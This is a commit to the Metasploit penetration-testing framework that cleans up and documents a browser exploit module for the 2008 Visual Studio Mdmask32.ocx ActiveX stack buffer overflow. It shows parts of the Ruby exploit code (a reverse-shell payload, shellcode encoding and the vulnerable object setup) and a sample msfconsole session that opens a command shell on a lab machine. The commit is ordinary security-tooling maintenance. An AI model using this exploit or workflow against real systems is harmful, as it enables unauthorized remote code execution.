Land #20340, adds documentation and cleans up exploit/windows/browser/ms08_070_visual_studio_msmask

msutovsky-r7 · web-flow · commit b37b6487e31e · 2025-06-23T08:05:22.000+02:00
exploit/windows/browser/ms08_070_visual_studio_msmask: Cleanup and add documentation
diff --git a/documentation/modules/exploit/windows/browser/ms08_070_visual_studio_msmask.md b/documentation/modules/exploit/windows/browser/ms08_070_visual_studio_msmask.md
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual
+Studio 6.0. When passing a specially crafted string to the Mask
+parameter of the Mdmask32.ocx ActiveX Control, an attacker may
+be able to execute arbitrary code.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/browser/ms08_070_visual_studio_msmask`
+1. Do: `set SRVHOST [host]`
+1. Do: `set SRVPORT [port]`
+1. Do: `set URIPATH [uri]`
+1. Do: `set PAYLOAD [payload]`
+1. Do: `run`
+1. Open the server URL on a vulnerable system
+
+
+## Options
+
+### URIPATH
+
+The server URI path to use. (default: `/`)
+
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/browser/ms08_070_visual_studio_msmask
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvhost 0.0.0.0
+srvhost => 0.0.0.0
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvport 8080
+srvport => 8080
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/
+[*] Server started.
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > 
+[*] 192.168.200.173  ms08_070_visual_studio_msmask - Sending Microsoft Visual Studio Mdmask32.ocx ActiveX Stack Buffer Overflow
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1052) at 2025-06-22 03:01:18 -0400
+```
diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb
@@ -12,40 +12,58 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow',
+        'Name' => 'Microsoft Visual Studio Mdmask32.ocx ActiveX Stack Buffer Overflow',
         'Description' => %q{
-          This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.
-          When passing a specially crafted string to the Mask parameter of the
-          Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary
-          code.
+          This module exploits a stack buffer overflow in Microsoft Visual
+          Studio 6.0. When passing a specially crafted string to the Mask
+          parameter of the Mdmask32.ocx ActiveX Control, an attacker may
+          be able to execute arbitrary code.
         },
         'License' => MSF_LICENSE,
-        'Author' => [ 'koshi', 'MC' ],
+        'Author' => [
+          'Symantec', # Discovery and PoC
+          'koshi', # Exploit
+          'MC' # Metasploit
+        ],
         'References' => [
+          [ 'BID', '30674' ],
           [ 'CVE', '2008-3704' ],
+          [ 'CWE', '119' ],
+          [ 'EDB', '6244' ],
+          [ 'EDB', '6317' ],
           [ 'OSVDB', '47475' ],
-          [ 'BID', '30674' ],
-          [ 'MSB', 'MS08-070' ]
+          [ 'MSB', 'MS08-070' ],
+          [ 'URL', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/44444' ],
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'process',
+          'PAYLOAD' => 'windows/shell/reverse_tcp',
+          'EXITFUNC' => 'process'
         },
         'Payload' => {
           'Space' => 1024,
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
         'Platform' => 'win',
+        'Arch' => [ARCH_X86],
         'Targets' => [
-          [ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ]
+          [
+            'Windows XP x86 SP0-SP3 IE 6.0 SP0-SP3', {}
+          ]
         ],
         'DisclosureDate' => '2008-08-13',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Masked Edit Control Memory Corruption Vulnerability'],
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => [UNRELIABLE_SESSION]
+        }
       )
     )
 
     register_options(
       [
-        OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
+        OptString.new('URIPATH', [ true, 'The server URI path to use.', '/' ])
       ]
     )
   end
@@ -58,33 +76,32 @@ def check_dependencies
     use_zlib
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload.
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((regenerate_payload(cli)).nil?)
 
     # Encode the shellcode.
     shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
     # Create some nops.
     nops = Rex::Text.to_unescape(make_nops(4))
 
-    # Randomize the javascript variable names.
-    vname = rand_text_alpha(rand(100) + 1)
-    var_i = rand_text_alpha(rand(30) + 2)
-    rand1 = rand_text_alpha(rand(100) + 1)
-    rand2 = rand_text_alpha(rand(100) + 1)
-    rand3 = rand_text_alpha(rand(100) + 1)
-    rand4 = rand_text_alpha(rand(100) + 1)
-    rand5 = rand_text_alpha(rand(100) + 1)
-    rand6 = rand_text_alpha(rand(100) + 1)
-    rand7 = rand_text_alpha(rand(100) + 1)
-    rand8 = rand_text_alpha(rand(100) + 1)
-    rand9 = rand_text_alpha(rand(100) + 1)
-    rand10 = rand_text_alpha(rand(100) + 1)
-    rand11 = rand_text_alpha(rand(100) + 1)
-    randnop = rand_text_alpha(rand(100) + 1)
+    # Randomize the JavaScript variable names.
+    var_i = rand_text_alpha(2..30)
+    rand1 = rand_text_alpha(1..100)
+    rand2 = rand_text_alpha(1..100)
+    rand3 = rand_text_alpha(1..100)
+    rand4 = rand_text_alpha(1..100)
+    rand5 = rand_text_alpha(1..100)
+    rand6 = rand_text_alpha(1..100)
+    rand7 = rand_text_alpha(1..100)
+    rand8 = rand_text_alpha(1..100)
+    rand9 = rand_text_alpha(1..100)
+    rand10 = rand_text_alpha(1..100)
+    rand11 = rand_text_alpha(1..100)
+    randnop = rand_text_alpha(1..100)
 
-    content = %Q|
+    content = %|
 <html>
   <script language="javascript">
   var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="';
@@ -110,7 +127,7 @@ def on_request_uri(cli, request)
 </html>
       |
 
-    print_status("Sending #{self.name}")
+    print_status("Sending #{name}")
 
     # Transmit the response to the client
     send_response_html(cli, content)
